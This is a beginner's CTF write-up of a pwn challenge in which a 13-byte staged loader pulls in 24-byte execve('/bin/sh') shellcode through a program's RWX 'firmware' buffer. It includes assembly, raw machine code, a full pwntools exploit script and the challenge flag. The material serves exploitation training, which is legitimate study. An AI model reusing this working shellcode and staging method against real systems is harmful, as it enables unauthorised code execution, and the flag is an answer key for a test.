TL;DR

RWX memory + 13-byte size limit = staged shellcode time! Upload a tiny loader (13 bytes) that reads a bigger shellcode (24 bytes), then execute it to get shell πŸš€

Challenge Files: chall (ELF binary)


Note: This is one of my first CTF writeups! At the time I solved this challenge, I was just starting out with pwn. There are probably cleaner/simpler ways to solve this, but this approach worked for me. If you spot improvements, feel free to share! πŸ™‚


Challenge Overview

We’re given a “Firmware Updater v1.0” for a “space core”.

The program has 3 options:

1. Upload an update      <- Our entry point
2. Run the firmware      <- Executes our code
3. Open a bidirectional connection  <- Just exits

Binary Protections

Let’s check what we’re dealing with:

$ checksec chall
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

What this means:

  • βœ… NX enabled - Stack isn’t executable (doesn’t matter, we have RWX mmap!)
  • βœ… PIE enabled - Addresses are randomized (also doesn’t matter for us)
  • ❌ No canary - Stack overflow protection disabled
  • ⚠️ Partial RELRO - GOT is writable

But here’s the thing: none of this matters because the program literally gives us RWX memory and executes whatever we send! The protections are meaningless when there’s a deliberate code execution feature. 😎

Source Code Analysis

Let’s look at the juicy parts:

long firmware_max_size = 0xd; // Only 13 bytes!
void *firmware;

// Allocate RWX memory - the good stuff
firmware = mmap(NULL, 0x1000, 
                PROT_READ | PROT_WRITE | PROT_EXEC, 
                MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

The program allocates 4KB (0x1000 bytes) with RWX permissions - read, write, AND execute. That’s shellcode heaven! But there’s a catch…

void upload_update(long firmware_max_size, void* firmware) {
   printf("Ready to receive update > ");
   bytes_read = read(0, firmware, firmware_max_size);
}

void apply_update(void* firmware) {
   ((void (*)())firmware)();  // Cast and execute!
}

The problem: We can only upload 13 bytes (0xd), but a full /bin/sh shellcode needs at least 20-30 bytes. Houston, we have a problem! 🚨

The Solution: Staged Shellcode

Since we can’t fit everything in 13 bytes, we’ll use a two-stage approach:

  1. Stage 1 (13 bytes): A tiny loader that reads more data
  2. Stage 2 (24 bytes): The actual execve shellcode

Think of it like a rocket: Stage 1 gets us into orbit, Stage 2 takes us to the moon! πŸŒ™

Stage 1: The Loader (13 bytes)

This shellcode reads additional bytes from stdin and stores them right after itself:

lea rsi, [rdi+0xd]   ; Calculate where to write (firmware + 13)
xor edi, edi         ; fd = 0 (stdin)
xor eax, eax         ; syscall number 0 (read)
push 0x18            ; Length to read (24 bytes)
pop rdx              ; rdx = 24 (size)
syscall              ; Call read(0, firmware+13, 24)

Machine code: \x48\x8d\x77\x0d\x31\xff\x31\xc0\x6a\x18\x5a\x0f\x05

How it works:

  1. When apply_update() is called, rdi contains the firmware address (function argument)
  2. lea rsi, [rdi+0xd] calculates the address right after our 13-byte shellcode
  3. We set up registers for read(0, firmware+13, 24) syscall
  4. After the syscall, execution continues right into Stage 2!

Stage 2: The Shell (24 bytes)

This is a classic execve("/bin/sh") shellcode:

xor rsi, rsi                      ; rsi = NULL (argv)
push rsi                          ; Push NULL (string terminator)
mov rdi, 0x68732f6e69622f2f       ; Load "//bin/sh" (little-endian)
push rdi                          ; Push "//bin/sh" onto stack
push rsp                          ; Push address of string
pop rdi                           ; rdi = address of "/bin/sh"
xor rdx, rdx                      ; rdx = NULL (envp)
mov al, 0x3b                      ; syscall 59 (execve)
syscall                           ; Call execve("/bin/sh", NULL, NULL)

Machine code: \x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\xb0\x3b\x0f\x05

Exploitation Flow

Here’s how the magic happens:

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ 1. Upload    β”‚  Send Stage 1 (13 bytes)
β”‚    Update    β”‚  
β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜
       β”‚
       β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ 2. Run       β”‚  Execute Stage 1
β”‚    Firmware  β”‚  
β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜
       β”‚
       β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Stage 1      β”‚  Calls read() to get more data
β”‚ executing... β”‚  Reads 24 more bytes
β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜
       β”‚
       β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Send Stage 2 β”‚  Our execve shellcode
β”‚ (24 bytes)   β”‚  
β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜
       β”‚
       β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Stage 2      β”‚  Spawns /bin/sh
β”‚ executing... β”‚  
β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜
       β”‚
       β–Ό
    🐚 SHELL!

Memory Layout

Before exploitation:

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ firmware address (0x1000 bytes)      β”‚
β”‚ Permissions: RWX                     β”‚
β”‚ Empty...                             β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

After uploading Stage 1:

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Stage 1 (13 bytes)                   β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Empty...                             β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

After Stage 1 executes:

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Stage 1 (13 bytes)                   β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Stage 2 (24 bytes) ← Just loaded!    β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Empty...                             β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Exploit Script

from pwn import *

# Connect to target
io = remote('challenges.404ctf.fr', PORT)
# or for local: io = process('./chall')

# Stage 1: Tiny loader (13 bytes)
stage1 = b"\x48\x8d\x77\x0d"  # lea rsi, [rdi+0xd]
stage1 += b"\x31\xff"          # xor edi, edi
stage1 += b"\x31\xc0"          # xor eax, eax
stage1 += b"\x6a\x18"          # push 0x18
stage1 += b"\x5a"              # pop rdx
stage1 += b"\x0f\x05"          # syscall

log.info(f"Stage 1 size: {len(stage1)} bytes")

# Stage 2: execve("/bin/sh") (24 bytes)
stage2 = b"\x48\x31\xf6"                          # xor rsi, rsi
stage2 += b"\x56"                                  # push rsi
stage2 += b"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68"  # mov rdi, "//bin/sh"
stage2 += b"\x57"                                  # push rdi
stage2 += b"\x54"                                  # push rsp
stage2 += b"\x5f"                                  # pop rdi
stage2 += b"\x48\x31\xd2"                          # xor rdx, rdx
stage2 += b"\xb0\x3b"                              # mov al, 0x3b
stage2 += b"\x0f\x05"                              # syscall

log.info(f"Stage 2 size: {len(stage2)} bytes")

# Step 1: Upload Stage 1
io.sendlineafter(b'> ', b'1')
io.sendafter(b'> ', stage1)

# Step 2: Execute firmware (Stage 1 runs and waits for input)
io.sendlineafter(b'> ', b'2')

# Step 3: Stage 1 is now waiting on read() - send Stage 2!
io.send(stage2)

# Get shell!
io.interactive()

Key Technical Points

1. The ModR/M Byte Matters!

A common mistake: using lea rsp, [rdi+0xd] instead of lea rsi, [rdi+0xd]. This would corrupt the stack pointer instead of setting up our destination address. Always double-check your assembly! πŸ”

2. Why Staged Shellcode?

This technique is super common in real exploits:

  • Limited initial space (buffer size restrictions)
  • Used in tools like Metasploit
  • Allows complex payloads despite space constraints

3. Direct Syscalls

We use raw syscalls instead of libc functions for:

  • Smaller code size
  • Maximum compatibility
  • No dependency on libc addresses

4. The “/bin/sh” String

We use //bin/sh (8 bytes) instead of /bin/sh (7 bytes) because it fits perfectly in a 64-bit register. The extra / doesn’t hurt - Linux treats // like /.

Lessons Learned

Exploitation techniques:

  1. Staged payloads - When space is limited, load a small loader first
  2. RWX memory abuse - If you can write and execute, game over
  3. Register conventions - Understanding calling conventions (rdi = first arg)
  4. Shellcode optimization - Every byte counts when space is tight
  5. Stack manipulation - Building strings on the stack for execve

Flag

404CTF{wh3n_l1fe_91ve5_you_LeMOn...}

Lemon